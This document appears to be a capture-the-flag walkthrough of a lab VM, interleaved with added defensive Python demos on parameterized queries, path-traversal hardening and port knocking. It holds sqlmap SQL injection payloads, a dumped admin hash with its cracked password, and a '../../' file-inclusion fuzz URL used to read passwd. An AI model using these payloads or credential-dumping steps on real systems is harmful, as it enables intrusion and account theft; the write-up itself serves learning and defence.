1、Information gathering
Using netdiscover, the target IP was found to be 192.168.57.155; nmap showed that only port 80 is open.
1.1、Trying injection
After opening the page, the search function looked like it might be vulnerable to SQL injection, so it was tested with sqlmap:
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [3]:
[*] information_schema
[*] Staff
[*] users
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
Database: Staff
Table: Users
[1 entry]
# Obtained the admin account of the current CMS; looking the hash up online gives: transorbital1
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
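Added example (not from this write-up, and not the target application's code): why the search box above is injectable, shown as the string-built query beside the parameterized one, run against a constructed in-memory SQLite table with six columns (matching the "6 columns" line in the sqlmap output). The StaffDetails schema, the rows and the marker value are constructed; the payload only copies the shape of the page's UNION payload (NULL padding plus a quoted marker in column 4).

```python
import sqlite3

# Constructed sample table: six columns, so a UNION payload must supply six
# values, as the "Generic UNION query (NULL) - 6 columns" line above notes.
STAFF_ROWS = [
    (1, "Mary", "Moe", "Sales", "555-0100", "marym@example.com"),
    (2, "Julie", "Dooley", "Human Resources", "555-0101", "julied@example.com"),
]


def make_db():
    """Create an in-memory SQLite database standing in for the Staff schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE StaffDetails (id INTEGER, firstname TEXT, lastname TEXT, "
        "position TEXT, phone TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO StaffDetails VALUES (?,?,?,?,?,?)", STAFF_ROWS)
    return conn


def search_vulnerable(conn, term):
    """The search as a string-built query: the term becomes part of the SQL text."""
    sql = f"SELECT * FROM StaffDetails WHERE lastname = '{term}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """The same search with a bound parameter: the term is only ever data."""
    sql = "SELECT * FROM StaffDetails WHERE lastname = ?"
    return conn.execute(sql, (term,)).fetchall()


# Same shape as sqlmap's UNION payload on this page: NULL padding around a
# quoted marker (sqlmap hex-encodes its markers, e.g. 0x716a627a71 = 'qjbzq')
# so the marker can be recognised in the response.  The trailing "-- -"
# comments out the closing quote the application appends.
MARKER = "qjbzq"
UNION_PAYLOAD = f"1' UNION ALL SELECT NULL,NULL,NULL,'{MARKER}',NULL,NULL-- -"


def marker_leaks(rows):
    """True when any returned row carries the marker in the fourth column."""
    return any(row[3] == MARKER for row in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", marker_leaks(search_vulnerable(db, UNION_PAYLOAD)))
    print("parameterized:", marker_leaks(search_parameterized(db, UNION_PAYLOAD)))
```

With the string-built query the marker row comes back, which is exactly the signal sqlmap looks for; with the bound parameter the whole payload is compared against the lastname column as a literal string and nothing matches.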
The CMS user is in hand; after logging in, what looks like a file inclusion vulnerability was found.
1.2、File inclusion fuzzing
192.168.57.155/manage.php?a=../../../../..b
# Used Burp to substitute values for a and b; fuzzing confirmed a file inclusion vulnerability that can read the `passwd` file but not `shadow`
# A knockd.conf file exists
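Added example (not from this write-up, and not manage.php's code): what makes the `?a=../../..` fuzzing above work, and two ways to close it. The concatenating resolver lets `..` segments walk out of the include root; the hardened one resolves the candidate path and refuses anything that does not stay under the root; the allow-list variant never uses the request value as a path at all. The directory tree (an include root with one page, and a `passwd` file outside it) is constructed in a temporary directory.

```python
import tempfile
from pathlib import Path

# Constructed directory tree standing in for the web root: the include root
# holds the legitimate pages, and a file outside it plays the part of passwd.
BASE = Path(tempfile.mkdtemp(prefix="lfi_demo_"))
INCLUDE_ROOT = BASE / "pages"
INCLUDE_ROOT.mkdir()
(INCLUDE_ROOT / "home.php").write_text("home page")
(BASE / "etc").mkdir()
(BASE / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")


def resolve_vulnerable(name):
    """Join the parameter onto the include root (the manage.php pattern)."""
    path = INCLUDE_ROOT / name          # '..' segments walk out of the root
    return path.read_text() if path.is_file() else None


def resolve_hardened(name):
    """Resolve the candidate path and refuse it unless it stays under the root."""
    root = INCLUDE_ROOT.resolve()
    candidate = (root / name).resolve()  # collapses '..' and follows symlinks
    try:
        candidate.relative_to(root)      # ValueError when the path escaped
    except ValueError:
        return None
    return candidate.read_text() if candidate.is_file() else None


# Stricter still: map request keys to file names, so the raw value is never
# interpreted as a path.
PAGES = {"home": "home.php"}


def resolve_allowlisted(key):
    """Look the key up in a fixed table; unknown keys get nothing."""
    fname = PAGES.get(key)
    return (INCLUDE_ROOT / fname).read_text() if fname else None


if __name__ == "__main__":
    for fn in (resolve_vulnerable, resolve_hardened):
        print(fn.__name__, "../etc/passwd ->", fn("../etc/passwd"))
    print("allowlisted home ->", resolve_allowlisted("home"))
```

The `resolve()` step matters: checking the string for `..` is not enough once symlinks or absolute paths are involved, whereas comparing the resolved path against the resolved root catches both.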
1.3、Using knockd
knockd is a port-knocking daemon: a hidden port is only opened once a client has connected to several ports in the configured order.
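Added example (not from this write-up, and not knockd's own code): a small model of the decision a port-knocking daemon makes, so the "correct order" rule above is concrete. Each source address has its own progress through the sequence; a knock on the wrong port discards that progress, and a sequence that takes longer than the timeout (knockd's `seq_timeout` setting) is discarded too. The knock ports and the packet log are constructed values, not the ones from the target's knockd.conf.

```python
from dataclasses import dataclass, field


@dataclass
class KnockSequence:
    """Per-source tracking of an ordered knock sequence (a model, not knockd)."""
    ports: list                       # ordered knock ports, constructed below
    seq_timeout: float = 5.0          # seconds allowed for the whole sequence
    _progress: dict = field(default_factory=dict)   # src_ip -> (next_idx, start_ts)
    opened: set = field(default_factory=set)        # sources granted the hidden port

    def observe(self, src_ip, dst_port, ts):
        """Feed one connection attempt. Returns True when the sequence completes."""
        idx, start = self._progress.get(src_ip, (0, ts))
        if idx > 0 and ts - start > self.seq_timeout:
            idx, start = 0, ts                  # partial sequence expired
        if dst_port != self.ports[idx]:
            self._progress.pop(src_ip, None)    # wrong knock: forget progress
            return False
        if idx == 0:
            start = ts                          # first correct knock starts the clock
        idx += 1
        if idx == len(self.ports):
            self.opened.add(src_ip)             # full sequence: open the hidden port
            self._progress.pop(src_ip, None)
            return True
        self._progress[src_ip] = (idx, start)
        return False

    def is_open(self, src_ip):
        return src_ip in self.opened


def replay(ports, events, seq_timeout=5.0):
    """Run a constructed (src_ip, dst_port, ts) log through one sequence."""
    seq = KnockSequence(list(ports), seq_timeout)
    for src, port, ts in events:
        seq.observe(src, port, ts)
    return seq.opened


# Constructed knock sequence and connection log.
KNOCK_PORTS = [1111, 2222, 3333]
SAMPLE_LOG = [
    ("10.0.0.5", 1111, 0.0), ("10.0.0.5", 2222, 0.4), ("10.0.0.5", 3333, 0.9),  # in order
    ("10.0.0.6", 1111, 1.0), ("10.0.0.6", 3333, 1.2), ("10.0.0.6", 2222, 1.5),  # out of order
    ("10.0.0.7", 1111, 2.0), ("10.0.0.7", 2222, 2.5), ("10.0.0.7", 3333, 9.0),  # too slow
]

if __name__ == "__main__":
    print("sources granted access:", replay(KNOCK_PORTS, SAMPLE_LOG))
```

Because a scanner probing ports in numeric order, or a client that is interrupted mid-sequence, never reaches the last knock in time, only the source that reproduces the exact order inside the window is let through; that is also why the sequence in knockd.conf has to be protected like a credential.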